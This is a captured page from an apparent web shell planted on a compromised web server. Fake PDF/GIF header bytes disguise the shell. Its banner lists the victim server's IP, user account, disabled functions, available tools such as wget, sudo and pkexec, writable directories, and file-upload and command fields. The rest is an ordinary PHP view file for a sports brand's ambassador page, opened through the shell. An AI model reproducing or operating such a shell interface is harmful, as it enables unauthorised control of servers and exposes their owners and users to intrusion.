%PDF-1.7 GIF89;
ANDA PELER
Server IP : 5.161.254.237  /  Your IP : 216.73.216.140
Web Server : Apache
System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : stellasp ( 1131)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/stellasp/public_html/application/themes/default/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/stellasp/public_html/application/themes/default/views/ambassador.php
<?php ob_start();?>
<script type="text/javascript">
var rotate;
$(document).ready(function(){
	$('.banner_container').each(function(item)
	{
		if(item != 0)
		{
			$(this).hide();
		}
	});
	if($('.banner_container').size() > 1)
	{
		rotate_banner();
	}
	
});

var cnt	= 0;

function rotate_banner()
{
	//stop the animations from going nuts when returning from minimize
	$('.banner_container:eq('+cnt+')').fadeOut();
	cnt++;
	if(cnt == $('.banner_container').size())
	{
		cnt = 0;
	}
	$('.banner_container:eq('+cnt+')').fadeIn(function(){
		setTimeout("rotate_banner()", 3000);
	});
}
</script>

<?php
$ads_javascript	= ob_get_contents();
ob_end_clean();


$additional_header_info = $ads_javascript;

include('header.php'); ?>
<script type="text/javascript">
$(window).load(function() {
    $("#flexiselDemo1").flexisel();
    $("#flexiselDemo2").flexisel({
        visibleItems: 4,
        itemsToScroll: 3,
        animationSpeed: 200,
        infinite: true,
        navigationTargetSelector: null,
        autoPlay: {
            enable: false,
            interval: 5000,
            pauseOnHover: true
        },
        responsiveBreakpoints: { 
            portrait: { 
                changePoint:480,
                visibleItems: 1,
                itemsToScroll: 1
            }, 
            landscape: { 
                changePoint:640,
                visibleItems: 2,
                itemsToScroll: 2
            },
            tablet: { 
                changePoint:768,
                visibleItems: 3,
                itemsToScroll: 3
            }
        }
    });
    $("#flexiselDemo3").flexisel({
        visibleItems: 3,
        itemsToScroll: 1,         
        autoPlay: {
            enable: true,
            interval: 5000,
            pauseOnHover: true
        }        
    });
    
    $("#flexiselDemo4").flexisel({
        infinite: false     
    });    
    
});
</script>

<div class="pro-breadcurms">
  <div class="container">
   <ol class="breadcrumb">
      <li>
      <a href="javascript:history.go(-1)"> <i class="fa fa-chevron-circle-left"></i>
 Back</a>
      </li>
      <li>
        <a href="<?php echo base_url();?>" class="active">Home</a>
      </li>
    
    </ol>


    <div class="col-md-12"><h2>Brands Ambassadors</small></h2></div>

  </div><!--pro breadcrums-->
</div>

<?php
		if ($this->session->flashdata('message'))
		{
			echo '<div class="gmessage">'.$this->session->flashdata('message').'</div>';
		}
		if ($this->session->flashdata('error'))
		{
			echo '<div class="error">'.$this->session->flashdata('error').'</div>';
		}
		if (!empty($error))
		{
			echo '<div class="error">'.$error.'</div>';
		}
	      ?>



<section class="blogdetail-main-wraper brands-main-container">
  <div class="container">
    <div class="row">

<div class="col-md-12">
    <h1>Brand Ambassadors of CA Sports</h1>
</div>

<?php		
$cat_counter = 1;
		
 foreach($products as $product):
?>  
  <a href="<?php echo site_url($product->slug); ?>">               
      <div class="col-md-4 col-sm-4">
        <div class="blog-wraper clearfix">
          <div class="blog-small-thumbnail">
          <?php
					$photo	= '<img src="'.base_url('images/nopicture.png').'" alt="'.lang('no_image_available').'" class="img-responsive"/>';
					$product->images	= array_values($product->images);
					
					if(!empty($product->images[0]))
					{
						$primary	= $product->images[0];
						foreach($product->images as $photo)
						{
							if(isset($photo->primary))
							{
								$primary	= $photo;
							}
						}

$photo	= '<img style="width:100%;" src="'.base_url('uploads/images/small/'.$primary->filename).'" alt="'.$product->seo_title.'" class="img-responsive"/>';
					}
					?>
	<?php echo $photo; ?>
           
            <div class="overlape brands-overlape">
              <img src="images/overlap-logo.png" alt="" class="overlayimage">
            </div>
          </div>

          <div class="col-sm-6">
            <h3 class="text-left"><?php echo $product->name;?></h3>
          </div>
          <div class="col-sm-6">
            <img src="<?php echo base_url('uploads/images/small/'.$product->image);?>" alt="" class="pull-right" height="75"/>
          </div>
         <div class="clearfix"></div>
          <ul class="ambassdor-detail">
            <li>Age: <span><?php echo $product->price;?> years</span></li>
            <li>Matches:<span><?php echo $product->saleprice;?></span></li>
            <li>Total Runs:<span><?php echo $product->quantity;?></span></li>
          </ul>
        </div>
      </div>
      </a>
      
 <?php 
  $cat_counter++;
  endforeach;
  ?>

      
    

</div><!--pro breadcrums-->
  </div><!--container-->
</section>



<?php include('footer.php'); ?>

Anon7 - 2022
SCDN GOK